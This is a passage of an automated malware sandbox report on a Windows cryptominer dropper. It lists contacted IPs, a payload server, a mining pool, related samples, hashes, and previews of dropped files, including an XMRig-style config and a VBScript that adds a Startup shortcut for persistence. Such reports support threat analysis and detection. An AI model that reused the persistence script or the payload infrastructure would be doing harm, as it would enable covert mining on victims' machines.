http://www.fontbureau.com/designers/frere-user.htmlP	tmp70CEtmp.exe, 00000004.00000003.715474589.000000000591F000.00000004.00000001.sdmp	false		high
http://www.urwpp.de/	tmp70CEtmp.exe, 00000004.00000003.714504589.000000000591E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deod	tmp70CEtmp.exe, 00000004.00000003.714504589.000000000591E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ascendercorp.com/typedesigners.html	tmp70CEtmp.exe, 00000004.00000003.711341370.000000000591E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/(	tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comV	tmp70CEtmp.exe, 00000004.00000003.710523038.000000000591F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/sDN	tmp70CEtmp.exe, 00000004.00000003.710770054.00000000058F4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://en.help.roblox.com/hc/en-us	svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comtra	tmp70CEtmp.exe, 00000004.00000003.710564689.0000000005920000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.de	tmp70CEtmp.exe, 00000004.00000003.717061110.0000000005920000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LZF5sOWnss.exe, 00000000.00000002.705273096.0000000002BB1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	tmp70CEtmp.exe, 00000004.00000003.711435516.000000000591E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersu	tmp70CEtmp.exe, 00000004.00000003.716946340.0000000005920000.00000004.00000001.sdmp	false		high
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure	svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	false		high
http://www.tiro.comslnt	tmp70CEtmp.exe, 00000004.00000003.710633941.0000000005920000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comica	tmp70CEtmp.exe, 00000004.00000003.710564689.0000000005920000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/develop	svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/N	tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comcom	tmp70CEtmp.exe, 00000004.00000003.710564689.0000000005920000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/G	tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.dees	tmp70CEtmp.exe, 00000004.00000003.717061110.0000000005920000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000007.00000003.740802375.0000022EEA17C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://corp.roblox.com/parents/	svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	false		high
https://xmrig.com/wizard	notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/v	tmp70CEtmp.exe, 00000004.00000003.711277231.00000000058F9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	tmp70CEtmp.exe, 00000004.00000003.710110354.000000000591E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.comIta	tmp70CEtmp.exe, 00000004.00000003.710523038.000000000591F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	tmp70CEtmp.exe, 00000004.00000003.715474589.000000000591F000.00000004.00000001.sdmp	false		high
http://45.144.Hbs	LZF5sOWnss.exe, 00000000.00000002.705386168.0000000002C28000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/v	tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/s	tmp70CEtmp.exe, 00000004.00000003.710770054.00000000058F4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.html	tmp70CEtmp.exe, 00000004.00000003.716315473.0000000005920000.00000004.00000001.sdmp	false		high
http://www.monotype.	tmp70CEtmp.exe, 00000004.00000003.720895206.0000000005920000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://iconscout.com/legal#licenses	csrss.13.dr	false		high
http://www.jiyu-kobo.co.jp/Y0-d	tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	notepad.exe, 0000000F.00000002.908232087.0000000000401000.00000040.00000001.sdmp	false	URL Reputation: safe	unknown
http://45.144.225.135/config.txtes	tmp70CEtmp.exe, 0000000D.00000002.910364506.00000000011A8000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/info/privacy	svchost.exe, 00000007.00000003.749051892.0000022EEA1BE000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.749031213.0000022EEA18D000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 00000007.00000003.739284688.0000022EEA1A9000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers;	tmp70CEtmp.exe, 00000004.00000003.716474850.0000000005920000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/	tmp70CEtmp.exe, 00000004.00000003.714695142.000000000591E000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/oby	tmp70CEtmp.exe, 00000004.00000003.710907528.00000000058FB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://RtlGetVersionntdll.dll	tmp70CEtmp.exe, 00000004.00000002.802365791.0000000002A95000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://45.144.225.135	LZF5sOWnss.exe, 00000000.00000002.705273096.0000000002BB1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.144.225.135	unknown	Netherlands		35913	DEDIPATH-LLCUS	false
142.44.242.100	unknown	Canada		16276	OVHFR	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	453465
Start date:	23.07.2021
Start time:	22:23:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	LZF5sOWnss (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.mine.winEXE@18/9@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 95.2% (good quality ratio 91.5%) Quality average: 77% Quality standard deviation: 25.2%
HCA Information:	Successful, ratio: 54% Number of executed functions: 60 Number of non-executed functions: 48
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 104.43.193.48, 52.147.198.201, 168.61.161.212, 20.82.210.154, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, skypedataprdcolcus17.cloudapp.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:24:27	API Interceptor	1x Sleep call for process: LZF5sOWnss.exe modified
22:24:41	API Interceptor	10x Sleep call for process: svchost.exe modified
22:25:39	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.144.225.135	P7Oa6i5muL.exe	Get hash	malicious	Browse	45.144.225.135/config.txt
	H9QnI1DbC1.exe	Get hash	malicious	Browse	45.144.225.135/config.txt
	7xhLwiPIrR.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	qhgv3aRzkZ.exe	Get hash	malicious	Browse	45.144.225.135/conhost.exe
	zIrx1wUddJ.exe	Get hash	malicious	Browse	45.144.225.135/config.txt
	E91sLsvV8S.exe	Get hash	malicious	Browse	45.144.225.135/config.txt
	SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	notepad.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	taskhost.exe	Get hash	malicious	Browse	45.144.225.135/config2.txt
	csrss.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	notepad.exe	Get hash	malicious	Browse	45.144.225.135/config.txt
	RcyatUBgOo.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	1fJCh9Qn75.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	xS9h6XCLaY.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	WHK1KXo5rL.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	ifulH09vsC.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	SecuriteInfo.com.Trojan.Siggen12.56619.6518.exe	Get hash	malicious	Browse	45.144.225.135/notepad.exe
	SecuriteInfo.com.__vbaHresultCheckObj.21994.exe	Get hash	malicious	Browse	45.144.225.135/config.txt
	SecuriteInfo.com.Trojan.Siggen12.45962.28547.exe	Get hash	malicious	Browse	45.144.225.135/godeth.exe
	SecuriteInfo.com.Variant.Johnnie.321295.17359.exe	Get hash	malicious	Browse	45.144.225.135/config.txt
142.44.242.100	4HoFnQosUb.exe	Get hash	malicious	Browse
	qhgv3aRzkZ.exe	Get hash	malicious	Browse
	notepad.exe	Get hash	malicious	Browse
	notepad.exe	Get hash	malicious	Browse
	RcyatUBgOo.exe	Get hash	malicious	Browse
	xS9h6XCLaY.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
xmr-us-east1.nanopool.org	4HoFnQosUb.exe	Get hash	malicious	Browse	142.44.242.100
	P7Oa6i5muL.exe	Get hash	malicious	Browse	142.44.242.100
	H9QnI1DbC1.exe	Get hash	malicious	Browse	144.217.14.139
	7xhLwiPIrR.exe	Get hash	malicious	Browse	142.44.243.6
	qhgv3aRzkZ.exe	Get hash	malicious	Browse	144.217.14.139
	zIrx1wUddJ.exe	Get hash	malicious	Browse	142.44.242.100
	E91sLsvV8S.exe	Get hash	malicious	Browse	142.44.243.6
	SecuriteInfo.com.Trojan.GenericKD.46284216.26505.exe	Get hash	malicious	Browse	144.217.14.109
	notepad.exe	Get hash	malicious	Browse	142.44.242.100
	csrss.exe	Get hash	malicious	Browse	144.217.14.109
	notepad.exe	Get hash	malicious	Browse	192.99.69.170
	RcyatUBgOo.exe	Get hash	malicious	Browse	144.217.14.109
	1fJCh9Qn75.exe	Get hash	malicious	Browse	144.217.14.109
	xS9h6XCLaY.exe	Get hash	malicious	Browse	142.44.243.6
	4FNTlzlu10.exe	Get hash	malicious	Browse	142.44.242.100
	73invoice #2307.exe	Get hash	malicious	Browse	142.44.242.100

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DEDIPATH-LLCUS	SecuriteInfo.com.Dropped.Trojan.GenericKD.37247948.2936.exe	Get hash	malicious	Browse	74.201.28.67
	1nM1IXHzg2.exe	Get hash	malicious	Browse	74.201.28.67
	OTzyxNyOTP.exe	Get hash	malicious	Browse	74.201.28.67
	EdZxuvmhwc.exe	Get hash	malicious	Browse	74.201.28.67
	skin.exe	Get hash	malicious	Browse	45.89.106.164
	stin.exe	Get hash	malicious	Browse	45.89.106.164
	oMNhCoZdeT.dll	Get hash	malicious	Browse	45.86.65.164
	lovemetertok.dll	Get hash	malicious	Browse	45.86.65.164
	Positions_invoice-103246.xlsm	Get hash	malicious	Browse	45.86.65.164
	4fZX8fJwHn.dll	Get hash	malicious	Browse	45.86.65.164
	MtSvkc87ybOwjvd.exe	Get hash	malicious	Browse	74.201.28.32
	purch_details_7683561.xlsm	Get hash	malicious	Browse	185.255.130.247
	3X5L2fP53V.xlsx	Get hash	malicious	Browse	185.255.130.247
	P7Oa6i5muL.exe	Get hash	malicious	Browse	45.144.225.135
	PO7581.exe	Get hash	malicious	Browse	45.15.143.171
	CreditCardAuth.jar	Get hash	malicious	Browse	45.133.1.212
	CreditCardAuth.jar	Get hash	malicious	Browse	45.133.1.212
	Receipt09072021.jar	Get hash	malicious	Browse	45.133.1.212
	Receipt09072021.jar	Get hash	malicious	Browse	45.133.1.212
	Swift Payment Copy.exe	Get hash	malicious	Browse	74.201.28.104
OVHFR	4HoFnQosUb.exe	Get hash	malicious	Browse	142.44.242.100
	SnCJx8VVDE.exe	Get hash	malicious	Browse	158.69.65.151
	atZdmSgC4J.exe	Get hash	malicious	Browse	158.69.65.151
	ZyikLEasGq.exe	Get hash	malicious	Browse	51.178.146.144
	#6495PI-29458-2020.exe	Get hash	malicious	Browse	147.135.255.78
	PI9SGLOVEDA01912.exe	Get hash	malicious	Browse	51.79.119.220
	Statement from NTXSD.exe	Get hash	malicious	Browse	51.75.191.89
	JOYPEn9pr9	Get hash	malicious	Browse	149.60.183.129
	47a8af.exe.exe	Get hash	malicious	Browse	158.69.65.151
	Comprobante1.vbs	Get hash	malicious	Browse	167.114.22.12
	92CRMNlBq8	Get hash	malicious	Browse	198.27.68.34
	Taf5zLti30	Get hash	malicious	Browse	188.165.232.76
	5qpsqg7U0G	Get hash	malicious	Browse	51.79.241.67
	LyxN1ckWTW	Get hash	malicious	Browse	149.202.131.34
	c51w5YSYdO	Get hash	malicious	Browse	164.133.166.62
	sX21AoaplqFHxse.exe	Get hash	malicious	Browse	54.38.220.85
	G1638.exe	Get hash	malicious	Browse	213.186.33.5
	eAtDhymLzp	Get hash	malicious	Browse	213.32.50.249
	qt75NPEt0t	Get hash	malicious	Browse	149.202.27.98
	qgQgEjI283	Get hash	malicious	Browse	164.132.56.199

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\LKBNMTFJgl\cfg Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2140
Entropy (8bit):	5.557738244951003
Encrypted:	false
SSDEEP:	48:lCHUL3qQEzCmini9iqvciaXkih9icue6bhvYbUbo:EH9QWv/ih9Tue6ybUE
MD5:	2DE48065534A637941090D8F3E04044F
SHA1:	EEAB2C38DD711A9BADB8265E11963732EA9C84DB
SHA-256:	8ABF520009CEA0E0C1B67563FD89C4C0E0403744942763D843E39EED180A1ED7
SHA-512:	2D1466D5F09DF4F6628092A2D7D210728536A1649CFECAE362D907D61088E32574290A350848F161C67FE008B2E46864161134C63560763BE932C3A631A24DC1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki

C:\ProgramData\LKBNMTFJgl\cfgi Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2140
Entropy (8bit):	5.5574864173164125
Encrypted:	false
SSDEEP:	48:lCHUL3qQEzlmini9iqvciaXkih9icue6bhvYbUbo:EH9QZv/ih9Tue6ybUE
MD5:	6CAEE3EB287981EC875E5AD3B85DBA1D
SHA1:	665E6F0252A71C6AA31A7FBCE07D9301182953C5
SHA-256:	4DD2C67C3EF1DE5A70FE97123AA01C2D7FEAFB96F079EF2DE0E64CB9D73A54A8
SHA-512:	B6C71536CC290FFE07F1638ED99588CBB8C78997A72CCDF0D8E9059D8D4C932CB8E5195F06A42DF2CBACFE650C9A4CD1616DE30D03DC947E2902C103C4A7E6B8
Malicious:	false
Preview:	ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiA0DQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQki

C:\ProgramData\LKBNMTFJgl\csrss Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3627520
Entropy (8bit):	6.686736411250198
Encrypted:	false
SSDEEP:	49152:JJjN9IQEiXrMhVoo5g+XoQG15WzZp13/Ln7c4lo4nC8sbXQdrb:bnIQEiUEPb
MD5:	D572DA9202196121D952231F26D65D07
SHA1:	8934580E7EE3F3852E159298769BDD38BCAA12A0
SHA-256:	15337A846C1E262136124361B3624DDD3519CF3C7F93ABA1ED75728A482FC662
SHA-512:	DE311F400E980D5FC987D6A5262057823B9DC3F9E7930623FAB16C9954977949B3B0901DE136548DB1F3A7B5D864DAD2738C791D511241CE4E49E8D83F7DEA5A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X..`.................(7..0.......G7.. ...`7...@.. ........................7...........@.................................8G7.W....`7. ,....................7...................................................... ............... ..H............text....'7.. ...(7................. ..`.rsrc... ,...`7......7.............@..@.reloc........7......X7.............@..B................tG7.....H.......<-7..............3..@.6..........................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0...........(......-.&+.(....+..........................0..'........,..{....,..{....o.......-.&&+.(....+.*..0..L........s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&.s.....:....&&..:....&.{.....o.....{......s....o.....{....r...po.....{.....P..s....o.....{.....o.....{....r...po

C:\ProgramData\LKBNMTFJgl\e9c1286a28_3.1.0 Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
File Type:	data
Category:	dropped
Size (bytes):	3272
Entropy (8bit):	3.5391176048802047
Encrypted:	false
SSDEEP:	24:PnPWWWWWWWWWWciWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWr:0wfIa
MD5:	97336FD69071FE322CC57F730C0EA273
SHA1:	97C86F938D64DD5EB84BDD6D0C16AC73B0762590
SHA-256:	F5C9FAF94FDBE5C9317FC89D5536B1CF3D0520EFB17A504DD9AA0E15F9607CF6
SHA-512:	160225663F7EC8D181AD5DC4E51ADE2E1AAE76B6D456B17B68E6E1D340290A21AF000CA297ED298C7D6B7B12DB8679EA81AA90EEDF2D92017E8C2CA93D289ADC
Malicious:	false
Preview:	H\@.BK.WUGB..VTV_A]Z[.V@S......801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125_LMB..................XVC]EYT.WMR892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892446978580125789244697858012578924469785801257892

C:\ProgramData\LKBNMTFJgl\r.vbs Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe
File Type:	data
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.6096823761330787
Encrypted:	false
SSDEEP:	12:DJhvugypjBQMyo7RKMJsW+jCRAbjMwCdKIiDHvhFkqy30mgZM3LCKKvbMX4FHkqc:DJhLKryjCyjMKFNyEmgZMbaDMoFHNc
MD5:	0570CE2E92083651B3134F7B560781C1
SHA1:	02729D9319B17C611413A4AF717F7B9F95A91DEC
SHA-256:	EE8DD7DF219C8CD652AAE5698054E11C0F70A8804AF064EC075C7A9FE2D816DE
SHA-512:	6B63B3B66E7054114513FF9A0E0745BC2B44718685EDA2D81806174C7BA0039F176BCFAC430EFC9E766CB02A012D3A82B15E3F51D17080E3AE9F2E373D8CDC24
Malicious:	true
Preview:	S.e.t. .o.b.j.F.S.O.=.C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".).....o.u.t.F.i.l.e.=.".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.t.a.r.t. .M.e.n.u.\.P.r.o.g.r.a.m.s.\.S.t.a.r.t.u.p.\.v.i.T.R.M.U.u.K.e.V...u.r.l.".....S.e.t. .o.b.j.F.i.l.e. .=. .o.b.j.F.S.O...C.r.e.a.t.e.T.e.x.t.F.i.l.e.(.o.u.t.F.i.l.e.,.T.r.u.e.).....o.b.j.F.i.l.e...W.r.i.t.e. .".[.I.n.t.e.r.n.e.t.S.h.o.r.t.c.u.t.].". .&. .v.b.C.r.L.f. .&. .".U.R.L.=.".".f.i.l.e.:./././.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.L.K.B.N.M.T.F.J.g.l.\.c.s.r.s.s...e.x.e.".".".....o.b.j.F.i.l.e...C.l.o.s.e.......

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LZF5sOWnss.exe.log Download File
Process:	C:\Users\user\Desktop\LZF5sOWnss.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.367899416177239
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
MD5:	7115A3215A4C22EF20AB9AF4160EE8F5
SHA1:	A4CAB34355971C1FBAABECEFA91458C4936F2C24
SHA-256:	A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
SHA-512:	2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

